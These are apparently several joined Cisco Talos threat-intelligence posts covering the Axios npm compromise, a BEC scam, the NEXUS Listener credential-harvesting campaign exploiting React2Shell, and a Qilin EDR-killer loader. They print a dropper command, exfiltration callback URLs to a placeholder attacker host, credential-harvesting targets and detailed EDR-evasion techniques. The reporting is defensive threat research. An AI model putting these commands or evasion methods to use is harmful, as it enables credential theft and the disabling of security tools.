In the span of just a few weeks, we have observed a dizzying array of major supply chain attacks. Prominent examples include the malicious modification of Axios, a popular HTTP client library for JavaScript, as well as cascading compromises from TeamPCP, a “chaos-as-a-service” group that injected malicious code into hijacked GitHub repositories for open-source projects, including Trivy, an open-source security scanner.

The impact of these supply chain attacks can be vast. Axios receives 100 million downloads weekly and innumerable organizations rely on the frameworks and libraries compromised by TeamPCP. The headache they pose to organizations and their security personnel is considerable as well; affected utilities can be integrated so deeply that it may be difficult to fully catalog, let alone remediate.

Although the timing, scale, and severity of these attacks can be shocking, this is not a new phenomenon. The supply chain has remained an attractive target for some time because of its fragility and the fact that a successful compromise can lead to countless additional downstream victims.

Findings from the recently published Talos 2025 Year in Review illustrate these long-standing trends. Nearly 25% of the top 100 targeted vulnerabilities we observed in 2025 affect widely used frameworks and libraries. Digging deeper into the list reveals additional insights. The React2Shell vulnerability affecting React Server Components became the top-targeted vulnerability of 2025 despite being disclosed in December, reflecting the speed at which these supply chain attacks can reach massive scale. The presence of Log4j vulnerabilities shows how deeply embedded these utilities can be and therefore how difficult it can be to reduce the attack surface. Although these particular examples represent extant vulnerabilities that can be weaponized by numerous adversaries versus a deliberate attack carried out by a single adversary, they show how impactful and disruptive threats to the supply chain can be. Follow-on attacks can range from ransomware to espionage, which is reflective of the broad swath of adversaries that carry them out — from sophisticated state-sponsored groups to teenage cyber criminals.

If we are all building on such shaky foundation, what can we do to keep safe? After all, it certainly seems dire when a tool such as Trivy that we could normally use to scan for supply chain vulnerabilities becomes compromised itself. But there are concrete steps we can take to improve our security posture.

As highlighted in the Year in Review, protecting identity is key. This includes securing CI/CD pipelines to prevent these types of compromises from occurring in the first place, as well as limiting the impact and lateral movement of an adversary should they obtain access to a downstream victim.

In addition, organizations must try to the best of their abilities to inventory the software libraries and frameworks they employ, stay informed of security incidents, and respond rapidly to implement patching and other mitigations.

Just as supply chain attacks are evergreen, so too is the efficacy of security fundamentals, such as segmentation, robust logging, multi-factor authentication (MFA), and the implementation of emergency response plans.

As trust continues to break down, the only viable solution may be to double down on vigilance. Since this recent spate of attacks represents a trend that will likely only grow in intensity and breadth, the time for action and planning is now.

Coverage

Below, find a sample of the some of the recent coverage we offer to protect against these threats:

ClamAV:
Txt.Trojan.TeamPCP-10059839-0

Txt.Trojan.TeamPCP-10059839-0

Behavioral Protections:
LiteLLM Supply Chain Compromise – alerts during installation of compromised packages

Cisco Talos is actively investigating the March 31, 2026 supply chain attack on the official Axios node package manager (npm) package during which two malicious versions (v1.14.1 and v0.30.4) were deployed. Axios is one of the more popular JavaScript libraries with as many as 100 million downloads per week.

Axios is a widely-deployed HTTP client library for JavaScript that simplifies HTTP requests, specifically for REST endpoints. The malicious packages were only available for approximately three hours, but if downloaded Talos strongly encourages that all deployments should be rolled back to previous known safe versions (v1.14.0 or v0.30.3). Additionally, Talos strongly recommends users and administrators investigate any systems that downloaded the malicious package for follow-on payloads from actor-controlled infrastructure.

Details of supply chain attack

The primary modification of the packages introduced a fake runtime dependency (plain-crypto-js) that executes via post-install without any user interaction required. Upon execution, the dependency reaches out to actor-controlled infrastructure (142[.]11[.]206[.]73) with operating system information to deliver a platform-specific payload to Linux, MacOS, or Windows.

On MacOS, a binary, “com.apple.act.mond”, is downloaded and run using zsh. Windows is delivered a ps1 file, which copies the legitimate powershell executable to “%PROGRAM DATA%\wt.exe”, and executes the downloaded ps1 file with hidden and execution policy bypass flags. On Linux, a Python backdoor is downloaded and executed. The payload is a remote access trojan (RAT) with typical associated capabilities allowing the actor to gather information and run additional payloads.

Impact

As with most supply chain attacks, the full impact will likely take some time to uncover. The threat actors exfiltrated credentials along with remote management capabilities. Therefore, Talos strongly recommends organizations treat any credentials present on their systems with the malicious package as compromised and begin the process of rotating them as quickly as possible. Actors are likely to try to weaponize access as quickly as possible to maximize financial gain.

Supply chain attacks tend to have unexpected downstream impacts, as these packages are widely used across a variety of applications, and the compromised credentials can be leveraged in follow-on attacks. For additional context, about 25% of the top 100 vulnerabilities in the Cisco Talos 2025 Year in Review affect widely used frameworks and libraries, highlighting the risk of supply chain-style attacks.

Talos will continue to monitor any follow-on impacts from this supply chain attack in the days and weeks ahead, as well as any additional indicators that are uncovered as a result of our ongoing investigation.

Indicators of Compromise (IoCs)

IP Address:
142[.]11[.]206[.]73

Domains:
Sfrclak[.]com

SHA256
e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09 (setup[.]js)
fcb81618bb15edfdedfb638b4c08a2af9cac9ecfa551af135a8402bf980375cf (Linux)
617b67a8e1210e4fc87c92d1d1da45a2f311c08d26e89b12307cf583c900d101 (Windows)
92ff08773995ebc8d55ec4b8e1a225d0d1e51efa4ef88b8849d0071230c9645a (MacOS)
ed8560c1ac7ceb6983ba995124d5917dc1a00288912387a6389296637d5f815c (6202033.ps1)

Welcome to this week’s edition of the Threat Source newsletter.

Last weekend, I witnessed a crime. Not a notable crime that you might read about in the press, but an unremarkable fraud attempt that nevertheless illustrates how new threat actor capabilities are emerging.

I imagine that most people reading this probably field IT questions from friends, family, and your local community. I assist with the IT provision for a local community association. It’s not a wealthy, large association — just your typical volunteer-run nonprofit like many others in the region providing community services.

This weekend, the chair emailed the treasurer requesting a bank transfer. The treasurer replied asking for the recipient's details, and the chair promptly responded. The emails appeared authentic: correct names, a sum consistent with the association's regular expenditure. Yet something made the treasurer pause. The reason for the transfer felt vague, and the tone seemed slightly off. They picked up the phone to verify. The chair had no idea what they were talking about. The emails and the request were an attempted fraud by a third party.

This is a variant of the business email compromise (BEC) scam in which an attacker impersonates a trusted individual and requests a fund transfer to an account they control. The attacker relies on social engineering to trick someone with payment authority to send the money. Once received, funds typically pass through money mules or compromised personal accounts before being rapidly shuffled through multiple transfers, obscuring the trail and drastically reducing the chances of recovery.

The initial email is often sent from a plausible email address. Closely scrutinising the sender’s email address may not help, since the attack may originate from the sender’s genuine account that has previously been compromised.

Historically, BEC targeted large organisations where anticipated payouts justified the time investment required to research key personnel and craft targeted attacks. The anticipated payout would more than cover the costs involved.

However, the fact that attackers are willing to target a small community organisation for a relatively small sum of money shows that the economics of the attack have changed.

AI has fundamentally altered the economics of BEC. Attackers can now reconnoitre many small organisations rapidly and cheaply. AI-generated content can be tailored to each target: referencing specific projects, using appropriate terminology, matching organisational tone.

The attack no longer needs to be labour-intensive or highly targeted. It's become democratised, and an accessible playbook for targeting any organisation. Community associations, local charities, or small businesses can now be targeted, both because the attack is easier to execute, but also because scamming smaller sums from many victims can be as profitable as scamming large sums from few victims. Unfortunately, because this profile of organisation may never have encountered this threat before, they may be unaware and consequently more vulnerable.

For every treasurer who pauses when something doesn’t quite feel right, there are others who will accept an apparently legitimate email at face value. Protection begins with awareness of how the fraud operates. Be suspicious of any unexpected request for payment, especially if there is a sense of urgency or reasons why a phone call "isn't possible" right now. Verify through separate channels before any transfer occurs. Call a known number for your contact, not one provided in the suspicious email. Enforce strict procurement rules that prevent any last-minute urgent payments.

Above all, recognise the democratisation of business email compromise scams. They’re no longer something that only happens to large corporations with complex supply chains and international operations. They’re for everyone now.

The one big thing 

Cisco Talos has identified a large-scale automated credential harvesting campaign that exploits React2Shell, a remote code execution vulnerability in Next.js applications (CVE-2025-55182). Using a custom framework called "NEXUS Listener," the attackers automatically extract and aggregate sensitive data — including cloud tokens, database credentials, and SSH keys — from hundreds of compromised hosts to facilitate further malicious activity. 

Why do I care? 

This campaign uses high-speed automation to exploit React2Shell, enabling attackers to rapidly harvest high-value credentials and establish persistent, unauthenticated access. This creates significant risks for lateral movement and supply chain integrity. Furthermore, the centralized aggregation of stolen data allows attackers to map infrastructure for targeted follow-on attacks and potential data breaches. 

So now what? 

Organizations should immediately audit Next.js applications for the React2Shell vulnerability and rotate all potentially compromised credentials, including API keys and SSH keys. Enforce IMDSv2 on AWS instances and implement RASP or tuned WAF rules to detect malicious payloads. Finally, apply strict least-privilege access controls within container environments to limit the potential impact of a compromise. 

Read the full blog for coverage and indicators of compromise (IOCs).

Top security headlines of the week 

F5 BIG-IP DoS flaw upgraded to critical RCE, now exploited in the wild 
The US cybersecurity agency CISA on Friday warned that threat actors have been exploiting a critical-severity F5 BIG-IP vulnerability in the wild. (SecurityWeek) 

European Commission investigating breach after Amazon cloud account hack 
The threat actor told BleepingComputer that they will not attempt to extort the Commission using the allegedly stolen data, but intend to leak it online at a later date. (BleepingComputer) 

Google fixes fourth Chrome zero-day exploited in attacks in 2026 
As detailed in the Chromium commit history, this vulnerability stems from a use-after-free weakness in Dawn, the underlying cross-platform implementation of the WebGPU standard used by the Chromium project. (BleepingComputer) 

Anthropic inadvertently leaks source code for Claude Code CLI tool 
Anthropic quickly removed the source code, but users have already posted mirrors on GitHub. They are actively dissecting the code to understand the tool's inner workings. (Cybernews) 

Can’t get enough Talos? 

Qilin EDR killer infection chain 
Take a deep dive into the malicious “msimg32.dll” used in Qilin ransomware attacks, which is a multi-stage infection chain targeting EDR systems. It can terminate over 300 different EDR drivers from almost every vendor in the market. 

An overview of 2025 ransomware threats in Japan 
In 2025, the number of ransomware incidents increased compared to 2024. Notably, it was a year in which attacks leveraging Qilin ransomware were observed most frequently. 

A discussion on what the data means for defenders 
To unpack the biggest Year in Review takeaways and what they mean for security teams, we brought together Christopher Marshall, VP of Cisco Talos, and Peter Bailey, SVP and GM of Cisco Security. 

When attackers become trusted users 
The latest TTP draws on 2025 Year in Review data to explore how identity is being used to gain, extend, and maintain access inside environments.

Upcoming events where you can find Talos 

• OffensiveCon (May 15 – 16) Berlin, Germany 

Most prevalent malware files from Talos telemetry over the past week 

SHA256: 96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974 
MD5: aac3165ece2959f39ff98334618d10d9 
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974 
Example Filename: d4aa3e7010220ad1b458fac17039c274_63_Exe.exe 
Detection Name: W32.Injector:Gen.21ie.1201 

SHA256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507 
MD5: 2915b3f8b703eb744fc54c81f4a9c67f 
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507 
Example Filename: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507.exe 
Detection Name: Win.Worm.Coinminer::1201 

SHA256: 90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59 
MD5: c2efb2dcacba6d3ccc175b6ce1b7ed0a 
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59 
Example Filename: APQ9305.dll 
Detection Name: Auto.90B145.282358.in02 

SHA256: 38d053135ddceaef0abb8296f3b0bf6114b25e10e6fa1bb8050aeecec4ba8f55 
MD5: 41444d7018601b599beac0c60ed1bf83 
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=38d053135ddceaef0abb8296f3b0bf6114b25e10e6fa1bb8050aeecec4ba8f55 
Example Filename: content.js 
Detection Name: W32.38D053135D-95.SBX.TG 

SHA256: 5e6060df7e8114cb7b412260870efd1dc05979454bd907d8750c669ae6fcbcfe 
MD5: a2cf85d22a54e26794cbc7be16840bb1 
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=5e6060df7e8114cb7b412260870efd1dc05979454bd907d8750c669ae6fcbcfe 
Example Filename: a2cf85d22a54e26794cbc7be16840bb1.exe 
Detection Name: W32.5E6060DF7E-100.SBX.TG 

SHA256: e303ac1a9b378382830fc6a0b5a9574eca415d14d9282e2b4aced725db9cfbc5 
MD5: 48a4f5fb6dc4633a41e6fe0aa65b4fa6 
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=e303ac1a9b378382830fc6a0b5a9574eca415d14d9282e2b4aced725db9cfbc5 
Example Filename: 48a4f5fb6dc4633a41e6fe0aa65b4fa6.exe 
Detection Name: W32.E303AC1A9B-95.SBX.TG 

In this episode of the Talos Threat Perspective, we explore how identity is being used to gain, extend, and maintain access inside environments. 

Drawing on insights from the 2025 Talos Year in Review, we break down how attackers are: 

·       Targeting identity systems and MFA workflows 

·       Establishing persistent, high-trust access 

·       Using internal phishing to move laterally 

·       Could potentially exploit over-permissioned AI agents and identity-linked access 

·       Blending into normal user behaviour 

This episode focuses on how identity enables attackers to scale their operations, and what that means for defenders trying to detect and contain them. 

Read the 2025 Cisco Talos Year in Review

Download now

Talos is disclosing a large-scale automated credential harvesting campaign carried out by a threat cluster we currently track as UAT-10608. The campaign is primarily leveraging a collection framework dubbed “NEXUS Listener.” The systematic exploitation and exfiltration campaign has resulted in the compromise of at least 766 hosts, as of time of writing, across multiple geographic regions and cloud providers. The operation is targeting Next.js applications vulnerable to React2Shell (CVE-2025-55182) to gain initial access, then is deploying a multi-phase credential harvesting tool that harvests credentials, SSH keys, cloud tokens, and environment secrets at scale. 

The breadth of the victim set and the indiscriminate targeting pattern is consistent with automated scanning — likely based on host profile data from services like Shodan, Censys, or custom scanners to enumerate publicly reachable Next.js deployments and probe them for the described React configuration vulnerabilities. 

The core component of the framework is a web application that makes all of the exfiltrated data available to the operator in a graphical interface that includes in-depth statistics and search capabilities to allow them to sift through the compromised data. 

This post details the campaign's methodology, tools, breadth and sensitivity of the exposed data, and the implications for organizations impacted by this activity. 

This analysis is based on data collected for security research purposes. Specific credentials and victim identifiers have been withheld from this publication. Talos has informed service providers of exposed and at-risk credentials and is working with industry partners such as GitHub and AWS to quarantine credentials and inform victims. 

Initial access 

UAT-10608 targets public-facing web applications using components, predominately Next.js, that are vulnerable to CVE-2025-55182, broadly referred to as “React2Shell.” 

React2Shell is a pre-authentication remote code execution (RCE) vulnerability in React Server Components (RSC). RSCs expose Server Function endpoints that accept serialized data from clients. The affected code deserializes payloads from inbound HTTP requests to these endpoints without adequate validation or sanitization. 

Exploitation steps 

1. An attacker identifies a publicly accessible application using a vulnerable version of RSCs or a framework built on top of it (e.g., Next.js). 
2. The attacker crafts a malicious serialized payload designed to abuse the deserialization routine — a technique commonly used to trigger arbitrary object instantiation or method invocation on the server. 
3. The payload is sent via an HTTP request directly to a Server Function endpoint. No authentication is required. 
4. The server deserializes the malicious payload, resulting in arbitrary code execution in the server-side Node.js process. 

Once the threat actor identifies a vulnerable endpoint, the automated toolkit takes over. No further manual interaction is required to extract and exfiltrate credentials harvested from the system. 

Automated harvesting script 

Data is collected via nohup-executed shell scripts dropped in /tmp with randomized names:

/bin/sh -c nohup sh /tmp/.eba9ee1e4.sh >/dev/null 2>&1

This is consistent with a staged payload delivery model. The initial React exploit delivers a small dropper that fetches and runs the full multi-phase harvesting script. Upon execution, the harvesting script iterates through several phases to collect various data from the compromised system, outlined below: 

• environ - Dump running process environment variables  
• jsenv - Extract JSON-parsed environment from JS runtime  
• ssh - Harvest SSH private keys and authorized_keys  
• tokens - Pattern-match and extract credential strings  
• history - Capture shell command history  
• cloud_meta - Query cloud metadata APIs (AWS/GCP/Azure)  
• k8s - Extract Kubernetes service account tokens  
• docker - Enumerate container configurations  
• cmdline - List all running process command lines  
• proc_all - Aggregate all process environment variables 

The framework leverages a meta.json file that tracks execution state: 

 Following the completion of each collection phase, an HTTP request is made back to the C2 server running the NEXUS Listener component. In most cases, the callback takes place on port 8080 and contains the following parameters: 

• Hostname 
• Phase 
• ID 

Some examples of the full URL, executed after each phase: 

http://<NEXUS_LISTENER_IP>:8080/h=<VICTIM_HOSTNAME>&l=info&id= 123abc45 

http://<NEXUS_LISTENER_IP>:8080/h=<VICTIM_HOSTNAME>&l=jsenv&id= 123abc45 

http://<NEXUS_LISTENER_IP>:8080/h=<VICTIM_HOSTNAME>&l=k8s&id=123abc45 

http://<NEXUS_LISTENER_IP>:8080/h=<VICTIM_HOSTNAME>&l=crontab&id=123abc45 

NEXUS Listener 

After data is exfiltrated from a compromised system and sent back to the C2 infrastructure, it is stored in a database and made available via a web application called NEXUS Listener. In most instances, the web application front end is protected with a password, the prompt for which can be seen in Figure 1. 

 In at least one instance, the web application was left exposed, revealing a wealth of information, including the inner workings of the application itself, as well as the data that was harvested from compromised systems. 

The application contains a listing of several statistics, including the number of hosts compromised and the total number of each credential type that were successfully extracted from those hosts. It also lists the uptime of the application itself. In this case, the automated exploitation and harvesting framework was able to successfully compromise 766 hosts within a 24-hour period. 

The web application allows a user to browse through all of the compromised hosts. A given host can then be selected, bringing up a menu with all of the exfiltrated data corresponding to each phase of the harvesting script. 

The observed NEXUS Listener instances display “v3” in the title, indicating the application has gone through various stages of development before reaching the currently deployed version.

Analysis 

Cisco Talos was able to obtain data from an unauthenticated NEXUS Listener instance. The following is an analysis of that data, broken down by credential category. 

Credential Categories 

Environment secrets and API keys 

The “environ.txt” and “jsenv.txt” files contain the runtime environment of each compromised application process, exposing a variety of third-party API credentials: 

• AI platform keys: OpenAI, Anthropic, NVIDIA NIM, OpenRouter, Tavily 
• Payment processors: Stripe live secret keys (sk_live_*) 
• Cloud providers: AWS access key/secret pairs, Azure subscription credentials 
• Communication platforms: SendGrid, Brevo/Sendinblue transactional email API keys, Telegram bot tokens and webhook secrets 
• Source control: GitHub personal access tokens, GitLab tokens 
• Database connection strings: Full DATABASE_URL values including hostnames, ports, usernames, and cleartext passwords 
• Custom application secrets: Auth tokens, dashboard passwords, webhook signing secrets — often high-entropy hex or Base64 strings 

SSH private keys 

Present in 78% of hosts, the “ssh.txt” files contain complete PEM-encoded private keys (both ED25519 and RSA formats) along with authorized_keys entries. These keys enable lateral movement to any other system that trusts the compromised host's key identity — a particularly severe finding for organizations with shared key infrastructure or bastion-host architectures. 

Cloud credential harvesting 

The “aws_full.txt” and “cloud_meta.txt” phases attempt to query the AWS Instance Metadata Service (IMDS), GCP metadata server, and Azure IMDS. For cloud-hosted targets, successful retrieval yields IAM role-associated temporary credentials — credentials that carry whatever permissions were granted to the instance role, which in misconfigured environments can include S3 bucket access, EC2 control plane operations, or secrets manager read access. 

Kubernetes service account tokens 

The “k8s.txt” phase targets containerized workloads, attempting to read the default service account token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token. A compromised Kubernetes token can allow an attacker to enumerate cluster resources, read secrets from other namespaces, or escalate to cluster-admin depending on RBAC configuration. 

Docker container intelligence 

For hosts running Docker (approximately 6% of the dataset), the “docker.txt” phase enumerates all running containers, their images, exposed ports, network configurations, mount points, and environment variables. Notable services observed include phpMyAdmin instances, n8n workflow automation, and internal administrative dashboards — all of which are high-value targets for follow-on access. 

Shell command history 

Command history files reveal operator behavior on compromised systems and other information that could be useful for post-compromise activity. Observed patterns include: 

• MySQL client invocations with explicit credentials: mysql -u root -p 
• Database service management: /etc/init.d/mysqld restart

Implications 

• Credential compromise and account takeover: Every credential in this dataset should be considered fully compromised. Live Stripe secret keys enable fraudulent charges and refund manipulation. AWS keys with broad IAM permissions enable cloud infrastructure takeover, data exfiltration from S3, and lateral movement within AWS organizations. Database connection strings with cleartext passwords provide direct access to application data stores containing user personally identifiable information (PII), financial records, or proprietary data. 
• Lateral movement via SSH: The large corpus of exposed SSH private keys creates a persistent lateral movement risk that survives the rotation of application credentials. If any of these keys are reused across systems (a common operational practice), the attacker retains access to those systems even after the initial compromise is detected and remediated. 
• Supply chain risk: Several hosts show evidence of package registry authentication files (“pkgauth.txt”), including npm and pip configuration with registry credentials. Compromised package registry tokens could enable a supply chain attack — publishing malicious versions of packages under a legitimate maintainer's identity. 
• Data aggregation and intelligence value: Beyond the immediate operational value of individual credentials, the aggregate dataset represents a detailed map of the victim organizations' infrastructure: what services they run, how they're configured, what cloud providers they use, and what third-party integrations are in place. This intelligence has significant value for crafting targeted follow-on attacks, social engineering campaigns, or selling access to other threat actors. 
• Reputational and regulatory exposure: For any organization whose data appears in this set, there are serious compliance implications. Database credentials exposing PII trigger breach notification requirements under GDPR, CCPA, and sector-specific regulations. Organizations that process payments whose Stripe keys are exposed face PCI DSS incident response obligations. The exposure of AI platform API keys can result in significant unauthorized usage charges in addition to the security risk. 

Recommendations 

1. Audit getServerSideProps and getStaticProps implementations: Ensure no secrets or server-only environment variables are passed as props to client components. 
2. Enforce NEXT_PUBLIC_ prefix discipline: Only variables that are intentionally public should carry this prefix. Audit all variables for misclassification. 
3. Rotate all credentials immediately if any overlap with the described victim profile is suspected. 
4. Implement IMDSv2 enforcement on all AWS EC2 instances to require session-oriented metadata queries, blocking unauthenticated metadata service abuse. 
5. Segment SSH keys: Avoid reusing SSH key pairs across different systems or environments. 
6. Enable cloud provider secret scanning: AWS, GitHub, and others offer native secret scanning that can detect and alert on committed or exposed credentials. 
7. Deploy runtime application self-protection (RASP) or a WAF rule set tuned for Next.js-specific attack patterns, particularly those targeting SSR data injection points. 
8. Audit container environments for least-privilege. Application containers should not have access to the host SSH agent, host filesystem mounts containing sensitive data, or overly permissive IAM instance roles. 

Coverage 

SNORT® ID for CVE-2025-55182, aka React2Shell: 65554 

Indicators of compromise (IOCs) 

Organizations should investigate for the following artifacts on web application hosts: 

• Unexpected processes spawned from /tmp/ with randomized dot-prefixed names (e.g., /tmp/.e40e7da0c.sh) 
• nohup invocations in process listings not associated with known application workflows 
• Unusual outbound HTTP/S connections from application containers to non-production endpoints 
• Evidence of __NEXT_DATA__ containing server-side secrets in rendered HTML 

IOCs for this threat also available on our GitHub repository here.

144[.]172[.]102[.]88  
172[.]86[.]127[.]128  
144[.]172[.]112[.]136  
144[.]172[.]117[.]112

This blog post provides an in-depth technical analysis of the malicious dynamic-link library (DLL) “msimg32.dll”, which Cisco Talos observed being deployed in Qilin ransomware attacks. The broader activities and attacks of Qilin was previously introduced and described in the blog post here.

This DLL represents the initial stage of a sophisticated, multi-stage infection chain designed to disable local endpoint detection and response (EDR) solutions present on compromised systems. Figure 1 shows a high-level diagram demonstrating the overall execution flow of this infection chain.

The first stage consists of a PE loader responsible for preparing the execution environment for the EDR killer component. This secondary payload is embedded within the loader in an encrypted form.

The loader implements advanced EDR evasion techniques. It neutralizes user-mode hooks and suppresses Event Tracing for Windows (ETW) event generation at runtime by leveraging a -like approach. Additionally, it makes extensive use of structured exception handling (SEH) and vectored exception handling (VEH) to obscure control flow and conceal API invocation patterns. This enables the EDR killer payload to be decrypted, loaded, and executed entirely in memory without triggering detection by the locally installed EDR solution.

Once active, the EDR killer component loads two helper drivers. The first driver (“rwdrv.sys”) provides access to the system’s physical memory, while the second driver (“hlpdrv.sys”) is used to terminate EDR processes. Prior to loading the second driver, the EDR killer component unregisters monitoring callbacks established by the EDR, ensuring that process termination can proceed without interference.

Overall, the malware is capable of disabling over 300 different EDR drivers across a wide range of vendors. While the campaign has been previously reported by , , and others at a higher level, this analysis focuses on previously undocumented technical details of the infection chain (e.g., the SEH/VEH tricks and the overwriting of certain kernel objects).

PE loader section (“msimg32.dll”)

The malicious DLL is most likely side-loaded by a legitimate application that imports functions from “msimg32.dll”. To preserve expected functionality, the original API calls are forwarded to the legitimate library located in “C:\Windows\System32”.

The version of “msimg32.dll” deployed by the threat actor triggers its malicious logic from within its DllMain function. As a result, the payload is executed as soon as the legitimate application loads the DLL.

Sophos also gave some technical and historical insights into this loader in their earlier blog, in which it is referred to as Shanya.

Initialization phase

During initialization, the loader allocates a heap buffer in process memory that acts as a slot-policy table.

The size of this buffer is computed as "ntdll.dll" OptionalHeader.SizeOfCode divided by 16 ( SizeOfCode >> 4), resulting in one byte per 16-byte code slot covering the code region as defined by OptionalHeader.SizeOfCode (typically the .text range). Each entry in the table corresponds to a fixed 16-byte block relative to BaseOfCode.

The loader then iterates over the export table of “ntdll.dll”. For each exported function whose name begins with "Nt", the virtual address of the corresponding syscall stub is resolved. From this address, a slot index is calculated as: slot_idx = (FuncVA - BaseOfCode)/16

This index is used to mark the corresponding entry in the slot-policy table. All Nt* stubs are assigned a default policy, while selected functions are explicitly marked with special policies, including:

• NtTraceEvent
• NtTraceControl
• NtAlpcSendWaitReceivePort

The result is a data-driven classification of relevant syscall stubs without modifying the executable code of “ntdll.dll”. The resulting slot-policy-table appears as follows:

The actual loader function is significantly more complex and incorporates additional obfuscation techniques, such as hash-based API resolution at runtime.

After constructing the table, the sample dynamically resolves ntdll!LdrProtectMrdata, which will be discussed in greater detail later. It then invokes this routine to change the protection of the .mrdata section to writable. This section contains the exception dispatcher callback pointer along with other critical runtime data.

Once the section is writable, the loader overwrites the dispatcher slot with its own custom exception handler. As a result, its routine is executed whenever an exception is triggered.

Runtime exception handling

This function primarily performs two tasks: handling breakpoint exceptions and single-step exceptions.

The handling of breakpoint exceptions (0xCC) is relatively straightforward. It simply resumes execution at the instruction immediately following the INT3 (0xCC). Talos is not certain why this approach was implemented. It may function as a lightweight anti-emulation, anti-analysis, or anti-sandbox mechanism for weak analysis systems, serve as groundwork for more advanced anti-debugging techniques, or act as preparation for future control-flow manipulation similar to the VEH-based logic observed in Stages 2 and 3.

The single-step portion of the function is significantly more complex and is where the previously introduced slot-policy table is utilized. ctx->ntstub_class_map points to the map buffer allocated during initialization.

Simplified the logic of the initialization and dispatch function looks like this in pseudo code. InitCtxAndPatchNtdllMrdataDispatch is the initialization function and hook_function_ExceptionCallback is the dispatch function mentioned above.

The find_syscall routine shown in Figure 7 implements a syscall recovery technique. Details can be found in the picture below. It scans both backward and forward through “ntdll.dll” to locate intact syscall stubs and identify neighboring syscalls that can be repurposed.

The simplified logic is as follows:

• Indirectly determine the target syscall number by scanning forward and backward.
• Locate a clean neighbouring stub.
• Manually load the correct syscall ID into eax.
• Transition directly to kernel mode using the syscall instruction (i.e., a syscall instruction located inside a clean neighboring stub).

By reusing a neighboring syscall stub to invoke the desired system call, the loader bypasses EDR-hooked syscalls without modifying the hooked code itself. The Windows kernel only evaluates the syscall ID in eax; it does not verify which exported API function initiated the call.

As previously mentioned, the actual code of the malware is more complex (e.g., the aforementioned runtime resolution of ntdll!LdrProtectMrdata).

The loader resolves the ntdll!LdrProtectMrdata function in a stealthy way. Instead of resolving LdrProtectMrdata by name or hash, the loader instead:

• Finds the .mrdata section in the “ntdll.dll” image
• Checks whether the current dispatcher slot pointer (dispatch_slot) lies inside .mrdata
• If it does, it uses a known exported ntdll function (RtlDeleteFunctionTable, located via hash) as an anchor
• From that anchor, it scans for a CALL rel32 instruction (0xE8) and extracts its target address
• That call target is the address of LdrProtectMrdata and stored in ctx->LdrProtectMrdata

The initialization routine described earlier also incorporates several basic anti-debugging measures. For example, it verifies whether a breakpoint has been placed on KiUserExceptionDispatcher. If such a breakpoint is detected, the process is deliberately crashed. This check is performed before the dispatcher is overwritten, which means that the resulting exception is handled by the original, default exception handler.

The loader also implements geo-fencing. It excludes systems configured for languages commonly used in post-Soviet countries. This check is performed at an early stage, and the loader terminates if a locale from the exclusion list is detected.

After initializing Stage 1, the loader proceeds to unpack the subsequent stages. It creates a paging file-backed section and maps two views of this section into the process address space. This aspect was not analyzed in depth; however, creating two views of the same section is a common malware technique used to obscure a READ-WRITE-EXECUTABLE memory region. Typically, one view is configured with WRITE access only, masking the effective executable permissions of the underlying section. This shared memory region will contain subsequent malware stages after unpacking them. This also makes it more difficult to dump the memory during analysis. When a virtual memory page is not currently present in RAM (present bit cleared), accessing it triggers a page fault. The kernel then resolves the fault (e.g., by loading the page from the pagefile into physical memory).

After creating the views, it copies and decodes bytes into this buffer. The basic block highlighted in green marks the start of this routine, while the red basic block represents the final control transfer (see Figure 17) to the decoded payload. The yellow basic block contains the decision logic that determines when execution transitions to the red basic block.

Inside the red basic block, we have the final jump into the decoded bytes of Stage 2.

Stage 2

Stage 2 (0x2470000) serves solely as a stealthy transition mechanism to transfer execution to Stage 3. As expected, all addresses referenced from this point onward, such as 0x2470000, may vary between executions of the loader, as they are dynamically allocated at runtime.

The initial part of Stage 2 is straightforward: It decodes the data stored in the memory section and then unmaps the previously mapped view. The subsequent function call constitutes the critical step: ctx->FuncPtrHookIAT((ULONGLONG)ctx->hooking_func);

This IAT-hooking routine overwrites the ExitProcess entry in the Import Address Table (IAT) of the main process (i.e., the process that loaded the malicious “msimg32.dll”).

As shown in Figure 18, execution returns normally from Stage 2, and DllMain completes without any obvious anomalies. The malicious logic is triggered later, when ExitProcess is invoked by exit_or_terminate_process during process termination. Instead of terminating the process, execution is redirected to function 0x2471000, which corresponds to Stage 3.

Stage 3

Stage 3 primarily decompresses and loads a PE image from memory that was originally embedded within the malicious “msimg32.dll”. It begins by resolving syscall stubs, which are used in subsequent code sections followed by decoding routines.

After several decoding and preparation steps, the PE image is decompressed from memory.

After the PE image has been decompressed, the final routine responsible for preparing, loading, and ultimately executing the PE can be found at 0x24A2CE7 in this run.

The fix_and_load_PE_set_VEH function begins by mapping “shell32.dll” into the process address space using NtCreateFile, NtCreateSection, and MapViewOfFile. It then overwrites the in-memory contents of “shell32.dll” with the previously loaded PE image.

After copying the embedded and decoded PE image into memory, the code manually applies base relocations.

After preparing the PE for in-memory execution, the loader employs a technique similar to Stage 2, but this time leveraging a vectored exception handler (VEH). After registering the VEH, it triggers the handler by setting a hardware breakpoint on ntdll!NtOpenSection. To indirectly invoke NtOpenSection, the loader subsequently loads a fake DLL via a call to the LdrLoadDll API. It appears that the malware author intentionally chose a name referencing a well-known security researcher, likely as a provocative touch.

After several intermediate steps, this results in a call to NtOpenSection, which triggers the previously configured hardware breakpoint and, in turn, invokes the VEH. The first time the VEH is triggered at NtOpenSection, it executes the code in Figure 29.

